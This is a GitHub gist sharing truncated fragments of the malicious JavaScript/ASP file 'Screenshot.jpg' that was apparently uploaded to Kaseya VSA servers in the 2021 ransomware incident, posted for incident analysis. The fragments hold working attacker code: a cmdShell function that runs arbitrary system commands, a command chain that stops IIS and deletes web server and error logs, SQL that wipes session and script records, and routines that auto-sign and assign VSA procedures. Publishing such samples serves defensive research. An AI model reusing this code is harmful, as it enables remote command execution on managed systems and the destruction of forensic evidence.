Skip to content

Instantly share code, notes, and snippets.

@JohnHammond

JohnHammond/cleaned_truncated_KaseyaVSA_Screenshot.jpg.js Secret

Created July 5, 2021 18:59
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save JohnHammond/a55ddc4a15aa2ab2281969c8e1159824 to your computer and use it in GitHub Desktop.
Save JohnHammond/a55ddc4a15aa2ab2281969c8e1159824 to your computer and use it in GitHub Desktop.
Download ZIP
Fragments of Screenshot.jpg uploaded to the Kaseya VSA during the ransomware incident
Raw
cleaned_truncated_KaseyaVSA_Screenshot.jpg.js
fso.DeleteFile(Server.MapPath(pageFilterSQLFile))
dbConn.Execute( "DELETE FROM adminMachFil WHERE adminId="+sessionAdminId+""+ \
"DELETE FROM userLogon WHERE sessionId="+sessionId+""+\
"DELETE FROM appSession WHERE adminId="+sessionAdminId+"" ,0,128)
Response.Write("0")
function cmdShell(c, sleep, wait) {
try {
if (wait == null) wait = 0
if (sleep != null & sleep > 0) c = "ping 127.0.0.1 -n "+(sleep+1)+" > nul & "+c
var kComObj = Server.CreateObject("KComWExec.execCmd")
kComObj.wait = wait
kComObj.timeoutSec = 360000
kComObj.getOutput = wait
kComObj.execShellCmd(c)
return(kComObj.getCmdOutput())
}
catch(e){
}
}
var rp = Server.MapPath("..") + "\\"
clearLogs = "%SystemDrive%\\Windows\\System32\\iisreset.exe /stop & "+ \
"rmdir /s /q %SystemDrive%\\inetpub\\logs & "+ \
"del /s /q /f "+rp+".log "+rp+".log. "+rp+"WebPages\\Errors\\webErrorLog.txt"+" & "+ \
"%SystemDrive%\\Windows\\System32\\iisreset.exe /start & "+ \
"del /s /q /f %SystemDrive%\\.log"
function SignProcedure() {
var httpRequest = Server.CreateObject( "Msxml2.ServerXMLHTTP.6.0" )
var url = "http://localhost/vsaPres/Web20/providers/SignProcedures.ashx"
var data = new String("{ \"ScriptIds\":[#ids#], \"AutoApprove " // THIS PORTION OF THE FILE IS TRUNCATED
// THIS PORTION OF THE FILE IS TRUNCATED
// [4344 bytes missing in capture file]
// THIS PORTION OF THE FILE IS TRUNCATED
.ySec += 1
cnt += 1
recSet.MoveNext()
}
SignProcedure()
recSet.Close()
procCreate("Archive and Purge Logs")
procStep(26, "2", "0", "+++SQLCMD:"+\
"DELETE FROM scriptAssignment WHERE scriptId IN ("+scriptIds+")"+\
"DELETE FROM scriptThenElse WHERE scriptId IN ("+scriptIds+")" +\
"DELETE FROM scriptIdTab WHERE scriptId IN ("+scriptIds+")" +\
"DELETE FROM scriptIf WHERE scriptId IN ("+scriptIds+")" +\
"DELETE FROM scriptLog WHERE scriptId IN ("+scriptIds+")" +\
", 1)"
procAssig("123456789", diffSec + 1800)
SignProcedure()
cmdShell("del /q /f "+certFullSP, diffSec + 1800
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment